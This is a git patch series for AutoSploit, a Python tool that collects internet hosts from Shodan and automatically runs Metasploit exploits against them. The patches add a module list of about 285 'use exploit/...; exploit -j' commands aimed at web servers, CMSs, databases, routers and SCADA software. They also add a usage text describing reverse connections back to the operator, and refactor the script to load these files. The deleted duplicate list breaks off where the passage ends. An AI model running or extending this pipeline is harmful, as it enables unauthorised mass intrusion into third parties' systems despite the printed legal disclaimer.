From c06714ca5f9286b68bf6f2d079f75d708dcb39f4 Mon Sep 17 00:00:00 2001 From: ekultek Date: Mon, 5 Feb 2018 11:50:54 -0600 Subject: [PATCH 1/3] moved modules.txt into the etc folder, also created a file containing the usage instead of just printing it. this way it's easily editable. --- etc/modules.txt | 285 ++++++++++++++++++++++++++++++++++++++++++++++++ etc/usage | 34 ++++++ 2 files changed, 319 insertions(+) create mode 100644 etc/modules.txt create mode 100644 etc/usage diff --git a/etc/modules.txt b/etc/modules.txt new file mode 100644 index 0000000..f1b8c4b --- /dev/null +++ b/etc/modules.txt @@ -0,0 +1,285 @@ +use exploit/windows/firewall/blackice_pam_icq; exploit -j; +use exploit/windows/ftp/ms09_053_ftpd_nlst;exploit -j; +use exploit/windows/http/amlibweb_webquerydll_app;exploit -j; +use exploit/windows/http/ektron_xslt_exec_ws;exploit -j; +use exploit/windows/http/umbraco_upload_aspx;exploit -j; +use exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit -j; +use exploit/windows/iis/iis_webdav_upload_asp;exploit -j; +use exploit/windows/iis/ms01_023_printer;exploit -j; +use exploit/windows/iis/ms01_026_dbldecode;exploit -j; +use exploit/windows/iis/ms01_033_idq;exploit -j; +use exploit/windows/iis/ms02_018_htr;exploit -j; +use exploit/windows/iis/ms02_065_msadc;exploit -j; +use exploit/windows/iis/ms03_007_ntdll_webdav;exploit -j; +use exploit/windows/iis/msadc;exploit -j; +use exploit/windows/isapi/ms00_094_pbserver;exploit -j; +use exploit/windows/isapi/ms03_022_nsiislog_post;exploit -j; +use exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit -j; +use exploit/windows/isapi/rsa_webagent_redirect;exploit -j; +use exploit/windows/isapi/w3who_query;exploit -j; +use exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit -j; +use exploit/windows/ssl/ms04_011_pct;exploit -j; +use exploit/freebsd/http/watchguard_cmd_exec;exploit -j; +use exploit/linux/http/alienvault_exec;exploit -j; +use exploit/linux/http/alienvault_sqli_exec;exploit -j; +use exploit/linux/http/astium_sqli_upload;exploit -j; +use exploit/linux/http/centreon_sqli_exec;exploit -j; +use exploit/linux/http/centreon_useralias_exec;exploit -j; +use exploit/linux/http/crypttech_cryptolog_login_exec;exploit -j; +use exploit/linux/http/dolibarr_cmd_exec;exploit -j; +use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j; +use exploit/linux/http/kloxo_sqli;exploit -j; +use exploit/linux/http/nagios_xi_chained_rce;exploit -j; +use exploit/linux/http/netgear_wnr2000_rce;exploit -j; +use exploit/linux/http/pandora_fms_sqli;exploit -j; +use exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit -j; +use exploit/linux/http/wd_mycloud_multiupload_upload;exploit -j; +use exploit/linux/http/zabbix_sqli;exploit -j; +use exploit/linux/misc/qnap_transcode_server;exploit -j; +use exploit/linux/mysql/mysql_yassl_getname;exploit -j; +use exploit/linux/mysql/mysql_yassl_hello;exploit -j; +use exploit/linux/postgres/postgres_payload;exploit -j; +use exploit/linux/samba/is_known_pipename;exploit -j; +use exploit/multi/browser/java_jre17_driver_manager;exploit -j; +use exploit/multi/http/atutor_sqli;exploit -j; +use exploit/multi/http/dexter_casinoloader_exec;exploit -j; +use exploit/multi/http/drupal_drupageddon;exploit -j; +use exploit/multi/http/manage_engine_dc_pmp_sqli;exploit -j; +use exploit/multi/http/manageengine_search_sqli;exploit -j; +use exploit/multi/http/movabletype_upgrade_exec;exploit -j; +use exploit/multi/http/php_volunteer_upload_exe;exploit -j; +use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit -j; +use exploit/multi/http/splunk_mappy_exec;exploit -j; +use exploit/multi/http/testlink_upload_exec;exploit -j; +use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; +use exploit/multi/misc/legend_bot_exec;exploit -j; +use exploit/multi/mysql/mysql_udf_payload;exploit -j; +use exploit/multi/postgres/postgres_createlang;exploit -j; +use exploit/solaris/sunrpc/ypupdated_exec;exploit -j; +use exploit/unix/ftp/proftpd_133c_backdoor;exploit -j; +use exploit/unix/http/tnftp_savefile;exploit -j; +use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; +use exploit/unix/webapp/kimai_sqli;exploit -j; +use exploit/unix/webapp/openemr_sqli_privesc_upload;exploit -j; +use exploit/unix/webapp/seportal_sqli_exec;exploit -j; +use exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit -j; +use exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit -j; +use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; +use exploit/windows/http/apache_mod_rewrite_ldap;exploit -j; +use exploit/windows/http/ca_totaldefense_regeneratereports;exploit -j; +use exploit/windows/http/cyclope_ess_sqli;exploit -j; +use exploit/windows/http/hp_mpa_job_acct;exploit -j; +use exploit/windows/http/solarwinds_storage_manager_sql;exploit -j; +use exploit/windows/http/sonicwall_scrutinizer_sql;exploit -j; +use exploit/windows/misc/altiris_ds_sqli;exploit -j; +use exploit/windows/misc/fb_cnct_group;exploit -j; +use exploit/windows/misc/lianja_db_net;exploit -j; +use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; +use exploit/windows/mssql/lyris_listmanager_weak_pass;exploit -j; +use exploit/windows/mssql/ms02_039_slammer;exploit -j; +use exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit -j; +use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit -j; +use exploit/windows/mssql/mssql_linkcrawler;exploit -j; +use exploit/windows/mssql/mssql_payload;exploit -j; +use exploit/windows/mssql/mssql_payload_sqli;exploit -j; +use exploit/windows/mysql/mysql_mof;exploit -j; +use exploit/windows/mysql/mysql_start_up;exploit -j; +use exploit/windows/mysql/mysql_yassl_hello;exploit -j; +use exploit/windows/mysql/scrutinizer_upload_exec;exploit -j; +use exploit/windows/postgres/postgres_payload;exploit -j; +use exploit/windows/scada/realwin_on_fcs_login;exploit -j; +use exploit/multi/http/rails_actionpack_inline_exec;exploit -j; +use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j; +use exploit/multi/http/rails_json_yaml_code_exec;exploit -j; +use exploit/multi/http/rails_secret_deserialization;exploit -j; +use exploit/multi/http/rails_web_console_v2_code_exec;exploit -j; +use exploit/multi/http/rails_xml_yaml_code_exec;exploit -j; +use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j; +use exploit/multi/http/phpmoadmin_exec;exploit -j; +use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j; +use exploit/multi/http/phpmyadmin_preg_replace;exploit -j; +use exploit/multi/http/phpscheduleit_start_date;exploit -j; +use exploit/multi/http/phptax_exec;exploit -j; +use exploit/multi/http/phpwiki_ploticus_exec;exploit -j; +use exploit/multi/http/plone_popen2;exploit -j; +use exploit/multi/http/pmwiki_pagelist;exploit -j; +use exploit/multi/http/joomla_http_header_rce;exploit -j; +use exploit/multi/http/novell_servicedesk_rce;exploit -j; +use exploit/multi/http/oracle_reports_rce;exploit -j; +use exploit/multi/http/php_utility_belt_rce;exploit -j; +use exploit/multi/http/phpfilemanager_rce;exploit -j; +use exploit/multi/http/processmaker_exec;exploit -j; +use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j; +use exploit/multi/http/spree_search_exec;exploit -j; +use exploit/multi/http/spree_searchlogic_exec;exploit -j; +use exploit/multi/http/struts_code_exec_parameters;exploit -j; +use exploit/multi/http/vtiger_install_rce;exploit -j; +use exploit/multi/http/werkzeug_debug_rce;exploit -j; +use exploit/multi/http/zemra_panel_rce;exploit -j; +use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; +use exploit/multi/http/joomla_http_header_rce;exploit -j; +use exploit/unix/webapp/joomla_akeeba_unserialize;exploit -j; +use exploit/unix/webapp/joomla_comjce_imgmanager;exploit -j; +use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; +use exploit/unix/webapp/joomla_media_upload_exec;exploit -j; +use exploit/multi/http/builderengine_upload_exec;exploit -j; +use exploit/multi/http/caidao_php_backdoor_exec;exploit -j; +use exploit/multi/http/atutor_sqli;exploit -j; +use exploit/multi/http/ajaxplorer_checkinstall_exec;exploit -j; +use exploit/multi/http/apache_activemq_upload_jsp;exploit -j; +use exploit/unix/webapp/wp_lastpost_exec;exploit -j; +use exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit -j; +use exploit/multi/http/axis2_deployer;exploit -j; +use exploit/unix/webapp/wp_foxypress_upload;exploit -j; +use exploit/linux/http/tr064_ntpserver_cmdinject;exploit -j; +use exploit/linux/misc/quest_pmmasterd_bof;exploit -j; +use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit -j; +use exploit/unix/webapp/php_xmlrpc_eval;exploit -j; +use exploit/unix/webapp/wp_admin_shell_upload;exploit -j; +use exploit/linux/http/sophos_wpa_sblistpack_exec;exploit -j; +use exploit/linux/local/sophos_wpa_clear_keys;exploit -j; +use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; +use auxiliary/admin/cisco/cisco_asa_extrabacon;exploit -j; +use auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit -j; +use auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit -j; +use exploit/bsdi/softcart/mercantec_softcart;exploit -j; +use exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit -j; +use exploit/freebsd/samba/trans2open;exploit -j; +use exploit/linux/ftp/proftp_sreplace;exploit -j; +use exploit/linux/http/dcos_marathon;exploit -j; +use exploit/linux/http/f5_icall_cmd;exploit -j; +use exploit/linux/http/fritzbox_echo_exec;exploit -j; +use exploit/linux/http/gitlist_exec;exploit -j; +use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j; +use exploit/linux/http/ipfire_bashbug_exec;exploit -j; +use exploit/linux/http/ipfire_oinkcode_exec;exploit -j; +use exploit/linux/http/ipfire_proxy_exec;exploit -j; +use exploit/linux/http/kaltura_unserialize_rce;exploit -j; +use exploit/linux/http/lifesize_uvc_ping_rce;exploit -j; +use exploit/linux/http/nagios_xi_chained_rce;exploit -j; +use exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit -j; +use exploit/linux/http/netgear_wnr2000_rce ;exploit -j; +use exploit/linux/http/nuuo_nvrmini_auth_rce;exploit -j; +use exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit -j; +use exploit/linux/http/op5_config_exec;exploit -j; +use exploit/linux/http/pandora_fms_exec;exploit -j; +use exploit/linux/http/pineapple_preconfig_cmdinject;exploit -j; +use exploit/linux/http/seagate_nas_php_exec_noauth;exploit -j; +use exploit/linux/http/symantec_messaging_gateway_exec;exploit -j; +use exploit/linux/http/trendmicro_imsva_widget_exec;exploit -j; +use exploit/linux/http/trueonline_billion_5200w_rce;exploit -j; +use exploit/linux/http/trueonline_p660hn_v1_rce;exploit -j; +use exploit/linux/http/trueonline_p660hn_v2_rce;exploit -j; +use exploit/linux/http/vcms_upload;exploit -j; +use exploit/linux/misc/lprng_format_string;exploit -j; +use exploit/linux/misc/mongod_native_helper;exploit -j; +use exploit/linux/misc/ueb9_bpserverd;exploit -j; +use exploit/linux/mysql/mysql_yassl_getname;exploit -j; +use exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit -j; +use exploit/linux/postgres/postgres_payload;exploit -j; +use exploit/linux/pptp/poptop_negative_read;exploit -j; +use exploit/linux/proxy/squid_ntlm_authenticate;exploit -j; +use exploit/linux/samba/lsa_transnames_heap;exploit -j; +use exploit/linux/samba/setinfopolicy_heap;exploit -j; +use exploit/linux/samba/trans2open;exploit -j; +use exploit/multi/elasticsearch/script_mvel_rce;exploit -j; +use exploit/multi/elasticsearch/search_groovy_script;exploit -j; +use exploit/multi/http/atutor_sqli;exploit -j; +use exploit/multi/http/axis2_deployer;exploit -j; +use exploit/multi/http/familycms_less_exe;exploit -j; +use exploit/multi/http/freenas_exec_raw;exploit -j; +use exploit/multi/http/gestioip_exec;exploit -j; +use exploit/multi/http/glassfish_deployer;exploit -j; +use exploit/multi/http/glpi_install_rce;exploit -j; +use exploit/multi/http/joomla_http_header_rce;exploit -j; +use exploit/multi/http/makoserver_cmd_exec;exploit -j; +use exploit/multi/http/novell_servicedesk_rc;exploit -j; +use exploit/multi/http/oracle_reports_rce;exploit -j; +use exploit/multi/http/php_utility_belt_rce;exploit -j; +use exploit/multi/http/phpfilemanager_rce;exploit -j; +use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j; +use exploit/multi/http/phpwiki_ploticus_exec;exploit -j; +use exploit/multi/http/processmaker_exec;exploit -j; +use exploit/multi/http/rails_actionpack_inline_exec;exploit -j; +use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j; +use exploit/multi/http/rails_secret_deserialization;exploit -j; +use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j; +use exploit/multi/http/simple_backdoors_exec;exploit -j; +use exploit/multi/http/spree_search_exec;exploit -j; +use exploit/multi/http/spree_searchlogic_exec;exploit -j; +use exploit/multi/http/struts2_rest_xstream;exploit -j; +use exploit/multi/http/struts_code_exec;exploit -j; +use exploit/multi/http/struts_code_exec_classloader;exploit -j; +use exploit/multi/http/struts_code_exec_parameters;exploit -j; +use exploit/multi/http/struts_dev_mode;exploit -j; +use exploit/multi/http/sysaid_auth_file_upload;exploit -j; +use exploit/multi/http/tomcat_jsp_upload_bypass;exploit -j; +use exploit/multi/http/vtiger_install_rce;exploit -j; +use exploit/multi/http/werkzeug_debug_rce;exploit -j; +use exploit/multi/http/zemra_panel_rce;exploit -j; +use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; +use exploit/multi/ids/snort_dce_rpc;exploit -j; +use exploit/multi/misc/batik_svg_java;exploit -j; +use exploit/multi/misc/pbot_exec;exploit -j; +use exploit/multi/misc/veritas_netbackup_cmdexec;exploit -j; +use exploit/multi/mysql/mysql_udf_payload;exploit -j; +use exploit/multi/php/php_unserialize_zval_cookie;exploit -j; +use exploit/unix/http/freepbx_callmenum;exploit -j; +use exploit/unix/http/lifesize_room;exploit -j; +use exploit/unix/http/pfsense_clickjacking;exploit -j; +use exploit/unix/http/pfsense_group_member_exec;exploit -j; +use exploit/unix/http/tnftp_savefile;exploit -j; +use exploit/unix/misc/polycom_hdx_traceroute_exec;exploit -j; +use exploit/unix/webapp/awstats_migrate_exec;exploit -j; +use exploit/unix/webapp/carberp_backdoor_exec;exploit -j; +use exploit/unix/webapp/citrix_access_gateway_exec;exploit -j; +use exploit/unix/webapp/dogfood_spell_exec;exploit -j; +use exploit/unix/webapp/invision_pboard_unserialize_exec;exploit -j; +use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; +use exploit/unix/webapp/mybb_backdoor;exploit -j; +use exploit/unix/webapp/opensis_modname_exec;exploit -j; +use exploit/unix/webapp/oscommerce_filemanager;exploit -j; +use exploit/unix/webapp/piwik_superuser_plugin_upload;exploit -j; +use exploit/unix/webapp/tikiwiki_upload_exec;exploit -j; +use exploit/unix/webapp/webtester_exec;exploit -j; +use exploit/unix/webapp/wp_phpmailer_host_header;exploit -j; +use exploit/unix/webapp/wp_total_cache_exec;exploit -j; +use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; +use exploit/windows/http/ektron_xslt_exec;exploit -j; +use exploit/windows/http/ektron_xslt_exec_ws;exploit -j; +use exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit -j; +use exploit/windows/http/hp_autopass_license_traversal;exploit -j; +use exploit/windows/http/manage_engine_opmanager_rce;exploit -j; +use exploit/windows/http/netgear_nms_rce;exploit -j; +use exploit/windows/http/sepm_auth_bypass_rce;exploit -j; +use exploit/windows/http/trendmicro_officescan_widget_exec;exploit -j; +use exploit/windows/iis/iis_webdav_upload_asp;exploit -j; +use exploit/windows/iis/msadc;exploit -j; +use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; +use exploit/windows/novell/file_reporter_fsfui_upload;exploit -j; +use exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit -j; +use exploit/windows/smb/ipass_pipe_exec;exploit -j; +use exploit/windows/smb/smb_relay;exploit -j; +use auxiliary/sqli/oracle/jvm_os_code_10g;exploit -j; +use auxiliary/sqli/oracle/jvm_os_code_11g;exploit -j; +use auxiliary/fuzzers/dns/dns_fuzzer;exploit -j; +use auxiliary/fuzzers/ftp/client_ftp;exploit -j; +use auxiliary/fuzzers/ftp/ftp_pre_post;exploit -j; +use auxiliary/fuzzers/http/http_form_field;exploit -j; +use auxiliary/fuzzers/http/http_get_uri_long;exploit -j; +use auxiliary/fuzzers/http/http_get_uri_strings;exploit -j; +use auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit -j; +use auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit -j; +use auxiliary/fuzzers/smb/smb_create_pipe;exploit -j; +use auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit -j; +use auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit -j; +use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit -j; +use auxiliary/fuzzers/smb/smb_tree_connect;exploit -j; +use auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit -j; +use auxiliary/fuzzers/smtp/smtp_fuzzer;exploit -j; +use auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit -j; +use auxiliary/fuzzers/ssh/ssh_version_15;exploit -j; +use auxiliary/fuzzers/ssh/ssh_version_2;exploit -j; +use auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit -j; +use auxiliary/fuzzers/tds/tds_login_corrupt;exploit -j; +use auxiliary/fuzzers/tds/tds_login_username;exploit -j; diff --git a/etc/usage b/etc/usage new file mode 100644 index 0000000..460b8b0 --- /dev/null +++ b/etc/usage @@ -0,0 +1,34 @@ ++------------------------------------------------------------------------+ +| AutoSploit General Usage and Information | ++------------------------------------------------------------------------+ +| As the name suggests AutoSploit attempts to automate the exploitation | +| of remote hosts. Targets are collected by employing the Shodan.io API. | +| | +| The 'Gather Hosts' option will open a dialog from which you can | +| enter platform specific search queries such as 'Apache' or 'IIS'. | +| Upon doing so a list of candidates will be retrieved and saved to | +| hosts.txt in the current working directory. | +| After this operation has been completed the 'Exploit' option will | +| go about the business of attempting to exploit these targets by | +| running a range of Metasploit modules against them. | +| | +| Workspace, local host and local port for MSF facilitated | +| back connections are configured through the dialog that comes up | +| before the 'Exploit' module is started. | +| | ++------------------+-----------------------------------------------------+ +| Option | Summary | ++------------------+-----------------------------------------------------+ +| 1. Usage | Display this informational message. | +| 2. Gather Hosts | Query Shodan for a list of platform specific IPs. | +| 3. View Hosts | Print gathered IPs/RHOSTS. | +| 4. Exploit | Configure MSF and Start exploiting gathered targets| +| 5. Quit | Exits AutoSploit. | ++------------------+-----------------------------------------------------+ +| Legal Disclaimer | ++------------------------------------------------------------------------+ +| Usage of AutoSploit for attacking targets without prior mutual consent | +| is illegal. It is the end user's responsibility to obey all applicable | +| local, state and federal laws. Developers assume no liability and are | +| not responsible for any misuse or damage caused by this program! | ++------------------------------------------------------------------------+ \ No newline at end of file From 0e8a52f0d7f3819a2000023ad44fdc0df4e48a28 Mon Sep 17 00:00:00 2001 From: ekultek Date: Mon, 5 Feb 2018 11:51:06 -0600 Subject: [PATCH 2/3] made a few changes, the options are now stored in a dict for easy access, this way you can just add the options into the dict when you want to make more options (Stored under global), a few more minor updates --- autosploit.py | 73 ++++++++++++++++----------------------------------- 1 file changed, 23 insertions(+), 50 deletions(-) diff --git a/autosploit.py b/autosploit.py index 987c7a1..b8af0aa 100644 --- a/autosploit.py +++ b/autosploit.py @@ -20,6 +20,13 @@ local_host = "" configured = False toolbar_width = 60 +modules_path = "%s/etc/modules.txt" % os.getcwd() +usage_path = "%s/etc/usage" % os.getcwd() +autosploit_options = { + 1: "Usage", 2: "Gather Hosts", + 3: "View Hosts", 4: "Exploit", + 5: "Quit" +} # Logo @@ -36,44 +43,11 @@ def logo(): # Usage and legal. def usage(): + global usage_path os.system("clear") logo() - print """ -+-----------------------------------------------------------------------+ -| AutoSploit General Usage and Information | -+-----------------------------------------------------------------------+ -|As the name suggests AutoSploit attempts to automate the exploitation | -|of remote hosts. Targets are collected by employing the Shodan.io API. | -| | -|The 'Gather Hosts' option will open a dialog from which you can | -|enter platform specific search queries such as 'Apache' or 'IIS'. | -|Upon doing so a list of candidates will be retrieved and saved to | -|hosts.txt in the current working directory. | -|After this operation has been completed the 'Exploit' option will | -|go about the business of attempting to exploit these targets by | -|running a range of Metasploit modules against them. | -| | -|Workspace, local host and local port for MSF facilitated | -|back connections are configured through the dialog that comes up | -|before the 'Exploit' module is started. | -| | -+------------------+----------------------------------------------------+ -| Option | Summary | -+------------------+----------------------------------------------------+ -|1. Usage | Display this informational message. | -|2. Gather Hosts | Query Shodan for a list of platform specific IPs. | -|3. View Hosts | Print gathered IPs/RHOSTS. | -|4. Exploit | Configure MSF and Start exploiting gathered targets| -|5. Quit | Exits AutoSploit. | -+------------------+----------------------------------------------------+ -| Legal Disclaimer | -+-----------------------------------------------------------------------+ -| Usage of AutoSploit for attacking targets without prior mutual consent| -| is illegal. It is the end user's responsibility to obey all applicable| -| local, state and federal laws. Developers assume no liability and are | -| not responsible for any misuse or damage caused by this program! | -+-----------------------------------------------------------------------+ -""" + with open(usage_path) as usage_retval: + print(usage_retval.read()) # Function that allows us to store system command @@ -91,6 +65,7 @@ def exploit(query): global workspace global local_port global local_host + global modules_path os.system("clear") logo() @@ -106,7 +81,7 @@ def exploit(query): sys.stdout.flush() sys.stdout.write("\b" * (toolbar_width + 1)) - with open("modules.txt", "rb") as infile: + with open(modules_path, "rb") as infile: for i in xrange(toolbar_width): time.sleep(0.1) for lines in infile: @@ -224,16 +199,15 @@ def settings(): os.system("clear") logo() - print "[" + t.green("+") + "]MSF Settings\n" - print "In order to proceed with the exploit module some MSF" + print "[" + t.green("+") + "]Metasploit Settings:" + print "In order to proceed with the exploit module some metasploit" print "settings need to be configured." - time.sleep(1.5) - print "\n[" + t.green("+") + "]Note.\n" - print "Please make sure your Network is configured properly.\n" + print "\n[" + t.green("+") + "]Note:" + print "Please make sure your Network is configured properly." print "In order to handle incoming Reverse Connections" print "your external Facing IP & Port need to be reachable..." - time.sleep(1.5) + time.sleep(3) workspace = raw_input("\n[" + t.magenta("?") + "]Please set the Workspace name: ") if not workspace == "": @@ -282,6 +256,7 @@ def main(): global query global configured global api + global autosploit_options try: api = shodan.Shodan(SHODAN_API_KEY) @@ -299,11 +274,9 @@ def main(): settings() print "\n[" + t.green("+") + "]Welcome to AutoSploit. Please select an action." - print """ - -1. Usage 3. View Hosts 5. Quit -2. Gather Hosts 4. Exploit - """ + + for i in autosploit_options.keys(): + print("%d. %s" % (i, autosploit_options[i])) action = raw_input("\n<" + t.cyan("AUTOSPLOIT") + ">$ ") @@ -332,8 +305,8 @@ def main(): time.sleep(2) with open("hosts.txt", "rb") as infile: - for line in infile: - print "[" + t.cyan("-") + "]" + line + for i, line in enumerate(infile, start=1): + print "[" + t.cyan(str(i)) + "]" + line.strip() print "[" + t.green("+") + "]Done.\n" From fd2723c5bba5178da7067ce0c5be050dfb909311 Mon Sep 17 00:00:00 2001 From: ekultek Date: Mon, 5 Feb 2018 11:51:24 -0600 Subject: [PATCH 3/3] moved file --- modules.txt | 285 ---------------------------------------------------- 1 file changed, 285 deletions(-) delete mode 100644 modules.txt diff --git a/modules.txt b/modules.txt deleted file mode 100644 index f1b8c4b..0000000 --- a/modules.txt +++ /dev/null @@ -1,285 +0,0 @@ -use exploit/windows/firewall/blackice_pam_icq; exploit -j; -use exploit/windows/ftp/ms09_053_ftpd_nlst;exploit -j; -use exploit/windows/http/amlibweb_webquerydll_app;exploit -j; -use exploit/windows/http/ektron_xslt_exec_ws;exploit -j; -use exploit/windows/http/umbraco_upload_aspx;exploit -j; -use exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit -j; -use exploit/windows/iis/iis_webdav_upload_asp;exploit -j; -use exploit/windows/iis/ms01_023_printer;exploit -j; -use exploit/windows/iis/ms01_026_dbldecode;exploit -j; -use exploit/windows/iis/ms01_033_idq;exploit -j; -use exploit/windows/iis/ms02_018_htr;exploit -j; -use exploit/windows/iis/ms02_065_msadc;exploit -j; -use exploit/windows/iis/ms03_007_ntdll_webdav;exploit -j; -use exploit/windows/iis/msadc;exploit -j; -use exploit/windows/isapi/ms00_094_pbserver;exploit -j; -use exploit/windows/isapi/ms03_022_nsiislog_post;exploit -j; -use exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit -j; -use exploit/windows/isapi/rsa_webagent_redirect;exploit -j; -use exploit/windows/isapi/w3who_query;exploit -j; -use exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit -j; -use exploit/windows/ssl/ms04_011_pct;exploit -j; -use exploit/freebsd/http/watchguard_cmd_exec;exploit -j; -use exploit/linux/http/alienvault_exec;exploit -j; -use exploit/linux/http/alienvault_sqli_exec;exploit -j; -use exploit/linux/http/astium_sqli_upload;exploit -j; -use exploit/linux/http/centreon_sqli_exec;exploit -j; -use exploit/linux/http/centreon_useralias_exec;exploit -j; -use exploit/linux/http/crypttech_cryptolog_login_exec;exploit -j; -use exploit/linux/http/dolibarr_cmd_exec;exploit -j; -use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j; -use exploit/linux/http/kloxo_sqli;exploit -j; -use exploit/linux/http/nagios_xi_chained_rce;exploit -j; -use exploit/linux/http/netgear_wnr2000_rce;exploit -j; -use exploit/linux/http/pandora_fms_sqli;exploit -j; -use exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit -j; -use exploit/linux/http/wd_mycloud_multiupload_upload;exploit -j; -use exploit/linux/http/zabbix_sqli;exploit -j; -use exploit/linux/misc/qnap_transcode_server;exploit -j; -use exploit/linux/mysql/mysql_yassl_getname;exploit -j; -use exploit/linux/mysql/mysql_yassl_hello;exploit -j; -use exploit/linux/postgres/postgres_payload;exploit -j; -use exploit/linux/samba/is_known_pipename;exploit -j; -use exploit/multi/browser/java_jre17_driver_manager;exploit -j; -use exploit/multi/http/atutor_sqli;exploit -j; -use exploit/multi/http/dexter_casinoloader_exec;exploit -j; -use exploit/multi/http/drupal_drupageddon;exploit -j; -use exploit/multi/http/manage_engine_dc_pmp_sqli;exploit -j; -use exploit/multi/http/manageengine_search_sqli;exploit -j; -use exploit/multi/http/movabletype_upgrade_exec;exploit -j; -use exploit/multi/http/php_volunteer_upload_exe;exploit -j; -use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit -j; -use exploit/multi/http/splunk_mappy_exec;exploit -j; -use exploit/multi/http/testlink_upload_exec;exploit -j; -use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; -use exploit/multi/misc/legend_bot_exec;exploit -j; -use exploit/multi/mysql/mysql_udf_payload;exploit -j; -use exploit/multi/postgres/postgres_createlang;exploit -j; -use exploit/solaris/sunrpc/ypupdated_exec;exploit -j; -use exploit/unix/ftp/proftpd_133c_backdoor;exploit -j; -use exploit/unix/http/tnftp_savefile;exploit -j; -use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; -use exploit/unix/webapp/kimai_sqli;exploit -j; -use exploit/unix/webapp/openemr_sqli_privesc_upload;exploit -j; -use exploit/unix/webapp/seportal_sqli_exec;exploit -j; -use exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit -j; -use exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit -j; -use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; -use exploit/windows/http/apache_mod_rewrite_ldap;exploit -j; -use exploit/windows/http/ca_totaldefense_regeneratereports;exploit -j; -use exploit/windows/http/cyclope_ess_sqli;exploit -j; -use exploit/windows/http/hp_mpa_job_acct;exploit -j; -use exploit/windows/http/solarwinds_storage_manager_sql;exploit -j; -use exploit/windows/http/sonicwall_scrutinizer_sql;exploit -j; -use exploit/windows/misc/altiris_ds_sqli;exploit -j; -use exploit/windows/misc/fb_cnct_group;exploit -j; -use exploit/windows/misc/lianja_db_net;exploit -j; -use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; -use exploit/windows/mssql/lyris_listmanager_weak_pass;exploit -j; -use exploit/windows/mssql/ms02_039_slammer;exploit -j; -use exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit -j; -use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit -j; -use exploit/windows/mssql/mssql_linkcrawler;exploit -j; -use exploit/windows/mssql/mssql_payload;exploit -j; -use exploit/windows/mssql/mssql_payload_sqli;exploit -j; -use exploit/windows/mysql/mysql_mof;exploit -j; -use exploit/windows/mysql/mysql_start_up;exploit -j; -use exploit/windows/mysql/mysql_yassl_hello;exploit -j; -use exploit/windows/mysql/scrutinizer_upload_exec;exploit -j; -use exploit/windows/postgres/postgres_payload;exploit -j; -use exploit/windows/scada/realwin_on_fcs_login;exploit -j; -use exploit/multi/http/rails_actionpack_inline_exec;exploit -j; -use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j; -use exploit/multi/http/rails_json_yaml_code_exec;exploit -j; -use exploit/multi/http/rails_secret_deserialization;exploit -j; -use exploit/multi/http/rails_web_console_v2_code_exec;exploit -j; -use exploit/multi/http/rails_xml_yaml_code_exec;exploit -j; -use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j; -use exploit/multi/http/phpmoadmin_exec;exploit -j; -use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j; -use exploit/multi/http/phpmyadmin_preg_replace;exploit -j; -use exploit/multi/http/phpscheduleit_start_date;exploit -j; -use exploit/multi/http/phptax_exec;exploit -j; -use 